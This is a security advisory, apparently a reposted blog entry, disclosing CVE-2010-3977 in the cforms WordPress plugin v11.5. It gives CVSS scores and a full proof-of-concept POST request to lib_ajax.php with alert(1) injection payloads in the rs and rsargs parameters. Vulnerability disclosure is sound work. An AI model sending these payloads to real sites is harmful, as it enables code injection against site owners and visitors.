Newsletter

News

Security Advisory: Cform WordPress Plugin v 11 | CVE-2010-3977

By
Share

Uma versão em PDF está também disponível | A PDF version is also available

Introduction

According to Delicious Days, “cforms is a powerful and feature rich form plugin for WordPress, offering convenient deployment of multiple Ajax driven contact forms throughout your blog or even on the same page.”

This problem was confirmed in the following versions of the cforms WordPress Plugin, other versions maybe also affected.

    • cforms v11.5

 

CVSS Scoring System

The CVSS score is: 5.5

    • Base Score: 6.7

 

    • Temporal Score: 5.5

 

    • We used the following values to calculate the scores:

 

    • Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N

 

    • Temporal score is: E:F/RL:OF/RC:C

 

Details

A data array is created in lib_ajax.php using values from a form field in a POST request.  The parameters rs and rsargs are not validated and thus it is possible to inject code.

Request:

http://<server>/wp-content/plugins/cforms/lib_ajax.php

POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1

Host: <server>

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:

1.9.2.10) Gecko/20100914 Firefox/3.6.10

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 219

Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do

%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce

%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do

%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;

c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t  ;

comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam

%40checkpoint.com

Pragma: no-cache

Cache-Control: no-cache

rs=alert(1)&rst=&rsrnd=1287506634854&rsargs[]=1$#

$alert(1)$#$rbranco_nospam@checkpoint.com$#$http://

http://www.checkpoint.com$#$alert(1)

 

Credits

This vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).

Originalmente postado no Blog da Conviso Application Security – Siga-nos no Twitter @conviso Google+
Share
About author

Articles

A team of professionals, highly connected on news, techniques and information about application security
Related posts
Application SecurityNews

What is SARIF and how it could revolutionize software security.

By
There is something happening behind the scenes in the software world that will make a difference in…
Read more
Share
Application SecurityNews

The Amazing Electrosphere

By
In the daily journey of security analysts, when performing intrusion tests, some steps end up being…
Read more
Share
Application SecurityCode FightersNews

Research: CVE-2021-43076 and the Risks Caused by Insecure Design

By
In the latest edition of OWASP TOP 10 Vulnerabilities 2021, some new categories were introduced in…
Read more
Share

1 Comment

Deixe um comentário

%d bloggers like this: